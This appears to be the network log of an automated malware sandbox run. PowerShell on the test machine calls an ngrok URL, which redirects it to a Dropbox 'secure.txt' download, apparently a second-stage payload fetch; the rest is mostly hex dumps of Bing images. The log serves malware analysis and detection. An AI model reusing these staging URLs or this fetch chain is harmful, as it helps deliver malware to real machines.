                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:35.771380901 CET1.1.1.1192.168.2.60xc936No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                  • 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                                                                                                                                                                                                                                                  • www.dropbox.com
                                                                                                                                                                                                                                                                  • tse1.mm.bing.net
                                                                                                                                                                                                                                                                  • ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • ucdccc1744965d58711471073024.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  • ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com

                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.6497143.124.142.2054436972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:12 UTC223OUTGET /api/secure/921edf0e40341466669afb0baebb3d6e HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:14 UTC321INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 395
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:13 GMT
                                                                                                                                                                                                                                                                  Location: https://www.dropbox.com/scl/fi/wwnpbujiyqqrqopwkxcyc/secure.txt?rlkey=x8uqd3ph21yp3dt3mo8o3rpnd&dl=1
                                                                                                                                                                                                                                                                  Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:14 UTC395INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 77 77 6e 70 62 75 6a 69 79 71 71 72 71 6f 70 77 6b 78 63 79 63 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 78 38 75 71 64 33 70 68 32 31 79 70 33 64 74 33 6d 6f 38 6f 33 72 70 6e 64 26 61 6d 70 3b
                                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/wwnpbujiyqqrqopwkxcyc/secure.txt?rlkey=x8uqd3ph21yp3dt3mo8o3rpnd&amp;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.649724162.125.69.184436972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:15 UTC236OUTGET /scl/fi/wwnpbujiyqqrqopwkxcyc/secure.txt?rlkey=x8uqd3ph21yp3dt3mo8o3rpnd&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://p [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com/cd/0/get/CgjThj9J4LYCxQ4m9781PB-i6DM8ie3o4ofLacmyEI5Ia-6dN3jN8vAwCUwbkPn36hUDAPHCB6NX0PsiCU-83zLbN8fqw1lkGaB-t9uzckUV7WQRvn5oGJz76GOJyZNHh8YQtnlHacLXQI3-Sa9mMX8K/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MjY1NDQ5NDk4MjY2MjUyOTQzMTU3ODAyMDY3NjE0NjY5MDY0ODQ1; Path=/; Expires=Tue, 18 Dec 2029 12:44:16 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=N-EWjXGQHqCtpf6MsblN311-; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:16 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=N-EWjXGQHqCtpf6MsblN311-; Path=/; Expires=Fri, 19 Dec 2025 12:44:16 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=xnqHzqmWVk; Path=/; Expires=Fri, 19 Dec 2025 12:44:16 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:16 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:16 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: d27b78b311e74e64b0c870372af5e54b
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  2192.168.2.649729150.171.27.10443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC346OUTGET /th?id=OADD2.10239340418577_1YCPJO6YBYEE06VWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                  Content-Length: 944920
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: F0761D08F7B34507B857B2A824532D93 Ref B: EWR311000104045 Ref C: 2024-12-19T12:44:16Z
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:16 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 ff c0 00 11 08 07 80 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                                                                                  Data Ascii: JFIFCC8"}!1AQa"q2
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 57 88 6a d6 b1 68 9e 26 5d 36 d3 c5 57 16 b6 96 13 b8 b7 e0 88 a7 b6 67 21 25 66 90 6d ca 8c 02 7d eb a2 9a f2 3f 87 9f b4 27 93 a1 e9 f6 f6 7a 37 8f e1 1e 6d b1 83 2d 14 e9 c3 aa b7 4f 2c 8d d2 6c e9 ba ae 7e d3 f7 5f 06 0f c4 ad 22 2d 47 c4 13 c3 6d a1 68 f7 77 3a a2 d9 86 26 f5 98 21 b4 b4 2b c8 0e cf b9 8f 1c 28 e6 be 87 2a cb 6b 4e bf ee 13 95 19 c7 9a f7 4e da 35 6b 3d 2f 74 e3 75 a7 5d 16 d9 d2 c3 de 8a a8 92 71 4e d7 7a 7f 5d d1 cd fc 27 4b af 10 fc 46 d4 2e bc 4b 6b 35 8e 8f 0e 95 3c da 7e a3 24 59 b7 79 d3 1e 52 48 cd fc 2c 41 c0 e3 39 15 c9 c9 6b e2 3f 10 d9 c7 26 81 a5 6a 56 ed a9 5a 4a 97 ec 17 6e c0 5b 0d 1b 93 c6 dd c0 e1 73 92 31 5c 7d d7 8f 2f fc 45 77 24 fe 20 4d 42 3d 0a 45 84 de d9 d8 b1 56 9d 46 15 e2 57 03 6c 7b c0 eb 8c 0e 3d 2b d4
                                                                                                                                                                                                                                                                  Data Ascii: Wjh&]6Wg!%fm}?'z7m-O,l~_"-Gmhw:&!+(*kNN5k=/tu]qNz]'KF.Kk5<~$YyRH,A9k?&jVZJn[s1\}/Ew$ MB=EVFWl{=+
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 6d 87 87 b4 5b 88 75 2f 88 1a bf 87 22 be b4 95 61 b7 11 34 da 7e ae 58 8d f1 24 b1 00 f1 cc 06 18 07 ea 33 c9 15 a5 1f 88 65 f1 a7 8d 74 3b bd 13 56 16 b6 73 b1 b9 86 2b c8 cc 2d 0b 2e 03 07 1c 85 e5 86 03 0e e2 bb ef 88 82 e6 1d 06 e3 49 d4 62 17 53 c4 b1 dc 2a 88 94 14 65 6e 1d 18 e4 0c 0c f2 07 42 6b 1c bf 35 79 3c 21 4e 71 95 93 77 7b 2b ea 95 9d b4 bf cf ee 07 8c 73 a3 0a 14 e5 28 ab 59 eb f9 7f 48 f9 87 c1 ff 00 08 f5 bf 0c 6b da 7e a1 af dc 69 5f d9 16 6a 97 26 51 76 18 4d 06 de 40 41 f3 ef 2a c0 84 c6 4e 78 af a4 be 12 fc 39 f8 43 6b 75 9d 37 c3 4b 7d ac 79 62 61 0e aa c6 49 a1 43 c8 69 23 24 88 87 3c 6e f9 8d 32 d7 c5 ba 54 f2 6b 1e 16 f1 c6 93 6d 71 24 9a b8 1f 68 92 cb cd fd db c4 9f 66 65 0b ca fc b9 1b fb 62 b7 6c f5 7d 17 c3 90 98 b4 9d 4e
                                                                                                                                                                                                                                                                  Data Ascii: m[u/"a4~X$3et;Vs+-.IbS*enBk5y<!Nqw{+s(YHk~i_j&QvM@A*Nx9Cku7K}ybaICi#$<n2Tkmq$hfebl}N
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: f6 ad 0b 38 ae 56 d4 11 2a 29 42 7e 4d bd 7d b3 54 ad 40 72 c8 b2 e3 23 38 e8 4d 5d 86 da e5 6c 56 78 d2 43 09 6c 24 80 7c b9 1d 40 3e b5 32 65 74 12 f2 09 6e 2e 9a e8 2f 95 bd 80 08 99 2a bf 9d 56 bd b2 b8 86 e9 48 56 91 0f de 2b 8c 63 d8 0e b5 b1 1a b1 b5 e0 e7 fb d9 3c fd 3e b4 b1 c5 bb 6c aa 19 94 e4 28 e9 cd 25 2b 19 fb 4b 7a 10 6b 1a 1d a6 9d e1 fd 3b 59 6b e3 34 fa 91 91 a3 b6 11 6d 11 c4 87 6e e6 3e a5 b2 00 03 a0 ac 78 63 90 ae f4 3c f7 cd 76 7e 22 d0 e7 d4 e1 d1 ed ad 9e 58 e4 36 43 ca 5b 9e 23 91 77 31 25 5b a0 00 96 ac 26 d2 ee 60 84 a1 2a cc bd 51 58 12 47 ad 67 1a d1 e4 57 7a 9d 32 71 e6 b2 32 e1 45 65 26 49 02 9f e1 eb cf d6 ad c3 88 23 50 67 da dd 30 39 a9 ef 2d a2 44 51 20 f2 d5 b1 f4 cf a7 e3 59 b2 23 c5 70 ca 8a ee a7 92 00 27 81 df f0
                                                                                                                                                                                                                                                                  Data Ascii: 8V*)B~M}T@r#8M]lVxCl$|@>2etn./*VHV+c<>l(%+Kzk;Yk4mn>xc<v~"X6C[#w1%[&`*QXGgWz2q2Ee&I#Pg09-DQ Y#p'
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: b7 4a 8d 36 d4 52 f8 ee fa b5 74 ef 6f 92 db 5d dd cf 0f 38 e1 e3 34 ac 9f 9f 5e d6 dc dd d7 be 1a 68 3e 24 f0 6b a7 84 25 f0 bd a4 31 a8 49 2e 34 dd 3e da e6 68 90 7f 02 f0 42 03 c6 5b ef 63 38 ae 0b c1 3e 18 f1 bf c2 e3 71 27 83 ec bc 2e 61 bc 6c 5f ea 36 76 ec 9a 8e cf ee a9 90 95 c9 3c 67 38 19 ce 38 ab be 07 f8 5b e1 6f 86 1a d5 c6 b1 63 ab 6b 87 54 b5 01 84 f6 92 2c 30 dc 46 df c2 6d d0 e1 f9 e9 bf eb 5d 4f c5 e3 e3 39 bc 07 0d b7 86 63 86 1d 72 7b a8 ee 6f 35 08 9d 23 68 ed d4 93 e5 44 8d 90 24 7f 94 12 78 51 b8 fa 57 3d 2c 4d 2a 72 f6 38 4c 4a f6 6f 7f 6a ac 9b f2 69 37 e9 7d 8a a5 09 53 a7 ef cd 77 f5 fb ff 00 13 c6 fe 22 6a bf 1d 75 9f 10 cb aa 5c 78 a3 fb 36 c0 85 4f b1 69 77 01 56 35 1c 66 49 31 b9 db a9 2c 71 f8 55 f8 ad 61 d3 e4 b5 97 5e b9
                                                                                                                                                                                                                                                                  Data Ascii: J6Rto]84^h>$k%1I.4>hB[c8>q'.al_6v<g88[ockT,0Fm]O9cr{o5#hD$xQW=,M*r8LJoji7}Sw"ju\x6OiwV5fI1,qUa^
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: b4 8d 3f 5c 86 ca 6d 57 c2 1a 1c 4f bd 6e 2f 63 89 8c 53 d9 4f 92 19 1e 30 ad b0 92 49 26 bc 96 1f 0f fd b3 e1 dd f6 b9 ad d9 6a 56 da 4f db 12 19 ae 52 db fd 32 fb 50 61 bd 96 28 cf dc 48 d7 25 8b 63 39 15 fa 36 17 0f 3a 14 60 9c 34 7b 35 d5 69 ad bf ad 57 6b b1 d5 a9 ad 96 af a9 cc c9 6f a5 5a 6a f7 d6 b3 ea b1 df 5c 59 bb 46 92 db 38 fb 3d ce 0f 2d 13 e0 31 53 db 20 57 44 ba 86 97 07 87 e4 d4 a1 d3 a6 b8 16 06 17 79 2c a4 f2 6e 6d 41 3d 55 ba 60 8c 82 48 e0 e2 b2 7c 1d e2 6d 33 40 b0 d4 2d 35 7d 13 ed 96 f7 52 49 f6 1b 89 e2 52 e1 b6 90 a1 b2 3a 1f 97 3e f5 ce f8 77 53 d4 34 b8 a4 b2 5b f9 62 b5 ba 51 15 c8 0a 1d 4c 64 8c 92 a7 9c 0e bc 7a 56 93 c3 54 ab 27 74 fd d6 ad ae 92 5d 6d 6d bf cd f6 39 25 88 6a 5a 69 fa 9e 89 f0 ef 4c b7 d7 3c 41 e2 2d 50 47
                                                                                                                                                                                                                                                                  Data Ascii: ?\mWOn/cSO0I&jVOR2Pa(H%c96:`4{5iWkoZj\YF8=-1S WDy,nmA=U`H|m3@-5}RIR:>wS4[bQLdzVT't]mm9%jZiL<A-PG
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: f0 bb 41 f1 37 87 ec b5 7b 8d 42 e2 f3 4a fd e2 d8 48 35 09 01 bc 6c e1 a4 50 b8 ca 64 71 c7 40 3b 56 1c 1f 18 7e 1b f8 cf 4d f1 22 81 ab 4b 67 a4 88 2d 34 db 64 61 08 d5 cc 8c 46 c5 5e 91 a0 da 09 dd fc 3c fb 56 05 ff 00 8a b5 2f 12 6a 56 fa 45 e8 b6 d3 e5 9b ca d3 f4 db 6b 3b 93 2c 6d f3 05 f2 d0 23 61 40 ec c7 a9 cd 7c 44 b0 99 ad 49 3e 64 e9 49 7a 68 9f 95 ef 7b 3f 97 ce cb 08 42 8c 2c 9f 5b 5b cc f4 49 7c 15 e2 4b 6f 06 d9 e8 be 0b 96 d6 de da d6 e1 9e f9 4d af 9b 24 f1 75 2a 1a 42 43 13 c8 38 00 01 58 da 5d d7 8a bc 2d f1 0e e3 5d 47 d2 74 db 0b fd 3d a2 7b 30 e7 17 53 22 ed 8c 94 c0 01 51 72 30 33 d6 b7 3e 27 7c 69 d0 7c 3d e3 cd 1b c1 7a 2d bd c6 a1 a6 e9 f7 51 59 eb 77 ea e0 43 64 80 05 29 1a 81 99 18 37 2c 7a 0c 1e a6 b9 3f 8f da bf 8a e0 f8 f5
                                                                                                                                                                                                                                                                  Data Ascii: A7{BJH5lPdq@;V~M"Kg-4daF^<V/jVEk;,m#a@|DI>dIzh{?B,[[I|KoM$u*BC8X]-]Gt={0S"Qr03>'|i|=z-QYwCd)7,z?
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16069INData Raw: 77 1e 30 2b cd 6c 7e 1b 78 bb c5 be 34 92 0d 0a d1 35 6b a5 0b 71 ab 5c ff 00 ab 8e cf cc 76 04 03 eb d7 a7 b5 7b 16 b9 af 4d 2d e7 89 b4 fd 17 4d bc d5 ad f4 a5 85 35 09 b6 9b 7b 18 6d d5 06 c1 1a 9e dc 8f 9f 19 39 15 cc fc 29 f1 47 8b bc 15 e2 69 2f 46 90 53 42 d6 d4 8b 9d 3a e0 38 59 95 41 28 c4 fd e5 c6 4e 1a b9 70 38 ac 6d 0a 15 65 49 45 4f 78 a9 3e e9 3b 6f cd dd a5 a6 ba ed a1 3c d2 94 d5 f6 30 bc 43 f0 79 f4 8d 3e 2d 35 35 7b 5b ad 76 1b e8 ed de 19 25 58 d5 16 45 66 00 02 73 90 53 9c fa 8a e8 be 24 af c3 68 bc 29 63 a2 e8 fa 7d e6 a7 ad 48 a1 e7 bf 8e df fd 1c 0d bf ea b3 d4 b8 3d 71 d3 15 91 f1 b0 5b 49 ae be a2 f7 5a 2d e5 c3 7e f3 cb b6 43 1c 7f 3e 08 50 c7 97 db d3 f0 35 c7 ae b8 3f b1 5e e7 5b f1 14 17 12 33 bd b2 69 96 72 b2 cb 65 18 50 7c
                                                                                                                                                                                                                                                                  Data Ascii: w0+l~x45kq\v{M-M5{m9)Gi/FSB:8YA(Np8meIEOx>;o<0Cy>-55{[v%XEfsS$h)c}H=q[IZ-~C>P5?^[3ireP|
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: a4 92 01 1e 5a 52 bd c7 ca 6a bd ad de a6 2e e5 16 2c a3 e6 5c 2a d4 7e 62 9e 31 d3 8e 6a d4 86 26 1d 3e 5e 9c d4 71 88 f7 60 2e ec fa d5 a6 21 d0 e3 23 78 f9 4f a7 51 4c 6d aa 08 51 f4 e6 a7 97 0b 1e 36 75 ef 8a 87 23 cc c9 00 50 03 70 fb cb 07 23 3d 69 d0 87 6e 25 91 94 1e 70 29 d3 60 c6 48 e3 1c f4 fe 54 42 e5 97 90 c4 83 c7 14 5f 40 b9 6d 00 8a 15 67 3f bb 7e 14 e7 ae 3d 2a 68 63 84 ae f4 3b 78 fc eb 39 a1 31 c9 90 0f 3d 3d 2a c4 73 21 f9 24 03 6e 39 22 a1 ae c4 dc 99 a6 65 62 b1 16 dd 8c 64 7f 85 11 df dd 2c 91 9b 88 00 45 e3 7e 32 7f 2e 94 e8 63 5d a1 62 19 c8 ea 29 cc b3 8f 97 3b 86 2b 3b ae c5 74 d4 b7 7f ad 58 4b a2 b5 a8 d3 95 a7 62 19 65 7f be a4 76 cf a5 60 4c 93 37 46 da 3b d5 c9 a6 0a c3 6e ed cd d7 e5 a9 2d e3 be ba 9a 1b 4b 7b 26 b8 96 e1
                                                                                                                                                                                                                                                                  Data Ascii: ZRj.,\*~b1j&>^q`.!#xOQLmQ6u#Pp#=in%p)`HTB_@mg?~=*hc;x91==*s!$n9"ebd,E~2.c]b);+;tXKbev`L7F;n-K{&
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: 2a dc 55 2a c6 3b c7 9a e9 6d fd 7f c1 3c b1 3e 0f 78 a3 c4 fa 64 fa 8f 85 60 6d 5f 49 d2 f1 17 f6 aa c2 61 b6 bb 71 f7 85 b8 6c 17 50 41 1b b1 83 49 e0 ff 00 87 7e 3e d3 7c af 17 36 90 9a 6c 9a 76 a1 0c f6 97 5a ae d8 23 69 d5 81 55 11 c9 8d e3 8e 72 31 80 6b ec bf 82 ff 00 14 bc 41 ad 6a 50 4b a5 f8 72 d8 f8 66 e2 4f 2e 28 6d 2d 17 ca b4 b7 50 4a c6 ab c7 96 48 c0 e3 22 b8 ef db 66 5f 0c 78 86 46 f0 9a f8 c9 74 9d 62 e9 e3 bf b2 d3 f5 db 19 16 d2 42 10 af 97 15 d6 36 a9 39 e5 4f 71 ef 5f 51 97 67 b3 ab 2e 4a 8a ce ef 44 ae d7 af 97 7d 3e 48 ee c2 d0 c0 54 a6 9c a0 d4 ac fe d6 ef a2 b5 b4 fb ff 00 e0 f1 5e 03 f8 cb e3 0f 1d fc 42 d4 34 8d 1b e1 ff 00 c2 f5 d7 e6 50 b2 de be 8d 14 d0 79 31 e7 cf 75 27 97 5d a0 b1 03 96 ed 5a d0 fe d0 be 37 6f 11 5f 78 33
                                                                                                                                                                                                                                                                  Data Ascii: *U*;m<>xd`m_IaqlPAI~>|6lvZ#iUr1kAjPKrfO.(m-PJH"f_xFtbB69Oq_Qg.JD}>HT^B4Py1u']Z7o_x3


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  3192.168.2.649727150.171.27.10443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC375OUTGET /th?id=OADD2.10239381963596_1EZBDO21TSG77E89L&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                  Content-Length: 612565
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: D7F630DA1871428899D96C7AE1C63397 Ref B: EWR30EDGE0720 Ref C: 2024-12-19T12:44:16Z
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:15 GMT
                                                                                                                                                                                                                                                                  Connection: close
